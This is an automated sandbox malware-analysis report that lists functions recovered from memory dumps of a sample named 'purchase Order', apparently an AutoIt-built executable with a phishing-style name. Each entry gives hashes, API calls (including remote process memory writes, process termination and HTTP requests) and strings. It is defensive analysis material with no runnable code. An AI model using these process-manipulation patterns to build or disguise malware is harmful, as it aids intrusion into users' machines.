Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: ed0d0a2344d43e4113f479a3a8f31e969977ca30fef62633eb87524c7aef8d25
Instruction ID: bdc956c6a37d1682865f4bba3b58c5d1bed550dcc8bcaf355470c634316208b8
Opcode Fuzzy Hash: ed0d0a2344d43e4113f479a3a8f31e969977ca30fef62633eb87524c7aef8d25
Instruction Fuzzy Hash: E10167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BE15C47A42C7F5A864CBE5

Function 00C89AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 4d8b92cd561d32d3d7c3e0e77f36aefebed705fc3f91d4f2370fdeebcfa911e1
Instruction ID: f7943956eadc62140b6932983582b7e1de648ee21b7c45329d8f6fe7bb271b13
Opcode Fuzzy Hash: 4d8b92cd561d32d3d7c3e0e77f36aefebed705fc3f91d4f2370fdeebcfa911e1
Instruction Fuzzy Hash: DB01A432202211ABD7192B94EC88FFF7769FF89706B08043AF503924A0DB749D01EB54

Function 00C87BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C87C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C87C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00C87C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C87C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C87C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C87C4C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5a3807199a58924ed7c8b8f787acd4382aa6e94a05473cc702c352fcea6a720e
Instruction ID: 1bdf352928bc3aa46c71e5bffc084bf49a93a0cfe34072c0c71a82f139fe4502
Opcode Fuzzy Hash: 5a3807199a58924ed7c8b8f787acd4382aa6e94a05473cc702c352fcea6a720e
Instruction Fuzzy Hash: B3F03A72241158BBE7215B52DC0EFEFBF7CEFC6B15F040068FA0291161E7A05A42C6B5

Function 00C89A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00C89A33
EnterCriticalSection.KERNEL32(?,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C89A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C89A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C89A5E

Part of subcall function 00C893D1: CloseHandle.KERNEL32(?,?,00C89A6B,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C893DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00C89A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C89A78

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b5079040cb2dff5d661a0e4b39255d8cd2cc33aa3463f4bdae20a239404cd62d
Instruction ID: 2b5a7cdbec7b6614b061603bc147e28184640836fab3e1ce9e7054a49233799a
Opcode Fuzzy Hash: b5079040cb2dff5d661a0e4b39255d8cd2cc33aa3463f4bdae20a239404cd62d
Instruction Fuzzy Hash: 80F05E72141211ABD7152BA4EC89FEE7739FF85302B180436F503914B0DB759D01EB50

Function 00C41CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 00C5F4EA: std::exception::exception.LIBCMT ref: 00C5F51E
Part of subcall function 00C5F4EA: __CxxThrowException@8.LIBCMT ref: 00C5F533

__swprintf.LIBCMT ref: 00C41EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C41D49

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 208a7336920e122420749b5b6fe99d88ac99c63f24dc79d99fb266ea925413d7
Instruction ID: 48985ca0bd901860e5e4c3f5aaf483065552241c4ca8318573fe557611853809
Opcode Fuzzy Hash: 208a7336920e122420749b5b6fe99d88ac99c63f24dc79d99fb266ea925413d7
Instruction Fuzzy Hash: 1E916C755042019FC724EF24C896CAEB7E4FF85700F04492DF996972A1DB30EE49EB92

Function 00C9AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C9B006
CharUpperBuffW.USER32(?,?), ref: 00C9B115
VariantClear.OLEAUT32(?), ref: 00C9B298

Part of subcall function 00C89DC5: VariantInit.OLEAUT32(00000000), ref: 00C89E05
Part of subcall function 00C89DC5: VariantCopy.OLEAUT32(?,?), ref: 00C89E0E
Part of subcall function 00C89DC5: VariantClear.OLEAUT32(?), ref: 00C89E1A

Strings

Incorrect Parameter format, xrefs: 00C9B03E, 00C9B20B
AUTOIT.ERROR, xrefs: 00C9B11B

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 710c9c7a7f8cb55e623d8177cfc613f611266f35bb46121a85da247839cbbc8d
Instruction ID: fcfb921669c4d8f3bb955a5fdaf1fe688a9cd2964c60779d63e98cb3db7dfe60
Opcode Fuzzy Hash: 710c9c7a7f8cb55e623d8177cfc613f611266f35bb46121a85da247839cbbc8d
Instruction Fuzzy Hash: 29915970608301AFCB10DF24D58995ABBE4FF89704F04886EF89A9B362DB31ED45DB52

Function 00C85347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5C6F4: _wcscpy.LIBCMT ref: 00C5C717

_memset.LIBCMT ref: 00C85438
GetMenuItemInfoW.USER32(?), ref: 00C85467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C85513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C8553D

Strings

0, xrefs: 00C85430

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: be625947b58d5afdae88c92c85141d84ff9a2335e125ca64015f8a4b8bd7bd27
Instruction ID: cb810d03b0c3a618168fae1dddacf6a287716c90da00bb2e6b1bc9879e2fe109
Opcode Fuzzy Hash: be625947b58d5afdae88c92c85141d84ff9a2335e125ca64015f8a4b8bd7bd27
Instruction Fuzzy Hash: 2C5104716047019BD715AB28C88176BBBE8EF85358F14062DF8A5D31E1DBF0CE44D75A

Function 00CAC4D7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(015E7710,?), ref: 00CAC544
ScreenToClient.USER32(?,00000002), ref: 00CAC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00CAC5DA

Strings

@U=u, xrefs: 00CAC630

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: @U=u
API String ID: 3880355969-2594219639
Opcode ID: 5ba8382cb0cdb50bbc37e693039d8d3e927e7c1bca4df96b10d70a2f040848ec
Instruction ID: f8adce9d836559c26b60d53aff3774fdccf7cb41ea6258f359db83a707f2a243
Opcode Fuzzy Hash: 5ba8382cb0cdb50bbc37e693039d8d3e927e7c1bca4df96b10d70a2f040848ec
Instruction Fuzzy Hash: 33513E7590020AEFCF10DF68C8C0AAE7BB5FB56328F508659F9659B290D770EE41DB90

Function 00C7C410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C7C462
__itow.LIBCMT ref: 00C7C49C

Part of subcall function 00C7C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C7C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C7C505
__itow.LIBCMT ref: 00C7C55A

Strings

@U=u, xrefs: 00C7C462, 00C7C505

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$__itow
String ID: @U=u
API String ID: 3379773720-2594219639
Opcode ID: 044cdbbecdc74936b7ddd04b2e4cf82198c058924bd673630b0ec56816ab9e6a
Instruction ID: 98df33b6253d5a24a0536d94dc0a6bd49be4f605dd03627d482f8325ad358e13
Opcode Fuzzy Hash: 044cdbbecdc74936b7ddd04b2e4cf82198c058924bd673630b0ec56816ab9e6a
Instruction Fuzzy Hash: 8841A771600209AFDF21DF54C891FFE7BB9AF49740F004019FA19A7192DB719A45DB91

Function 00C7C189 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C8430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C7BC08,?,?,00000034,00000800,?,00000034), ref: 00C84335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C7C1D3

Part of subcall function 00C842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C7BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00C84300

Part of subcall function 00C8422F: GetWindowThreadProcessId.USER32(?,?), ref: 00C8425A
Part of subcall function 00C8422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C8426A
Part of subcall function 00C8422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C84280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C7C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C7C28D

Strings

@, xrefs: 00C7C2A5
@U=u, xrefs: 00C7C1D3, 00C7C240, 00C7C28D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @$@U=u
API String ID: 4150878124-826235744
Opcode ID: 58dd17e5446ee8cd8decd033d84ce2e3caf8b3145be7df6bd8385cbeb7ccecc6
Instruction ID: 5d16a80ec95345acd473e64178e82a4f2cd60dae46b7a77675e7316cabee5454
Opcode Fuzzy Hash: 58dd17e5446ee8cd8decd033d84ce2e3caf8b3145be7df6bd8385cbeb7ccecc6
Instruction Fuzzy Hash: A8414872900219AFDB10EFA4CC81BEEB7B8AB09300F008099FA55B7191DA71AE45DB61

Function 00C80213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C8027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C802B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C802C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C80344

Strings

DllGetClassObject, xrefs: 00C802B7

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: d0b008ef5677d7424d91c8961a8bb4935e82617cda80a0f4893f378d7d329089
Instruction ID: 8d0270afeb68730db48643487dd63d5ae86d154b8ae63217af6b91da8ec2bd76
Opcode Fuzzy Hash: d0b008ef5677d7424d91c8961a8bb4935e82617cda80a0f4893f378d7d329089
Instruction Fuzzy Hash: A3415FB1600204EFDB45DF54C885BAE7BB9EF44318F2480ADE909DF256D7B1DA48CBA4

Function 00C85007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C85075
GetMenuItemInfoW.USER32 ref: 00C85091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00C850D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D01708,00000000), ref: 00C85120

Strings

0, xrefs: 00C8506D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 6ece51bbb5831c022e08ead4fd5c3543c48a517f7550f38e12f2e3a5bf3857ba
Instruction ID: 45bfe3e9314a87b58051a18cda6e8627e08cc1b382a11d0bc4cbe78e3194a9f5
Opcode Fuzzy Hash: 6ece51bbb5831c022e08ead4fd5c3543c48a517f7550f38e12f2e3a5bf3857ba
Instruction Fuzzy Hash: 3441E5702047019FD720EF24D885F6FBBE5AF85318F144A5EF86697291D7B0E904CB6A

Function 00CAB544 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CAB5D1

Strings

@U=u, xrefs: 00CAB620

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: 2fe318ee0bfecc0945ab0319e7f4926b08f2db4f31e80cc536ca44c4e9871650
Instruction ID: 4af916cd86d8a2664de0b64ae4bbad25899f8b56503279e0ddf08c8766cc5f3f
Opcode Fuzzy Hash: 2fe318ee0bfecc0945ab0319e7f4926b08f2db4f31e80cc536ca44c4e9871650
Instruction Fuzzy Hash: 3331D074A00206AFEB288F19CC85FEC7764AB07358F544511FA66D62E3C730AE909B51

Function 00CA0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00CA0587

Strings

none, xrefs: 00CA0662
stdcall, xrefs: 00CA0609
winapi, xrefs: 00CA05F8
cdecl, xrefs: 00CA05DE

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 593759f4cbb79a8fee008f1c7f827717e591b1f9b39cd10e3db611471be7d976
Instruction ID: 0592bcba1c1690ce468a839d81d2adf05810868a6fabb8098c9caed2c173f8d6
Opcode Fuzzy Hash: 593759f4cbb79a8fee008f1c7f827717e591b1f9b39cd10e3db611471be7d976
Instruction Fuzzy Hash: 6431927090021AAFCF04EF54C8419EEB3B4FF55358B108629F876A76D1DB71EA16CB80

Function 00C943E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C94401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C94427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C94457
InternetCloseHandle.WININET(00000000), ref: 00C9449E

Part of subcall function 00C95052: GetLastError.KERNEL32(?,?,00C943CC,00000000,00000000,00000001), ref: 00C95067

Strings

, xrefs: 00C94450

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 6becf1daea126f08690cce1c2e49ea50975cbbda30614d94017bf1d3540bdaf7
Instruction ID: ab5a451c9e18be34dab8c7ab6e563c9177684bafec9dd199c81b6588e33846ce
Opcode Fuzzy Hash: 6becf1daea126f08690cce1c2e49ea50975cbbda30614d94017bf1d3540bdaf7
Instruction Fuzzy Hash: 8521A4B5500208BFEB159F55CC89FBFB6FCEB48B44F10802AF509E2140EA748E06A771

Function 00CA90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C5D1BA
Part of subcall function 00C5D17C: GetStockObject.GDI32(00000011), ref: 00C5D1CE
Part of subcall function 00C5D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CA915C
LoadLibraryW.KERNEL32(?), ref: 00CA9163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CA9178
DestroyWindow.USER32(?), ref: 00CA9180

Strings

SysAnimate32, xrefs: 00CA9137

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 772cb88ca9ed6c8242dbfc797c006a2444c53e4fec122cef162f4616ec74be0e
Instruction ID: 2603adb539b39b865077678331c6715d256381b26611b5e64158007dcd0e3349
Opcode Fuzzy Hash: 772cb88ca9ed6c8242dbfc797c006a2444c53e4fec122cef162f4616ec74be0e
Instruction Fuzzy Hash: 00215071200207BBEF104E64DC8AFFF77A9EB5A368F104618FA6596190C771DD51A760

Function 00C89568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C89588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C895B9
GetStdHandle.KERNEL32(0000000C), ref: 00C895CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C89605

Strings

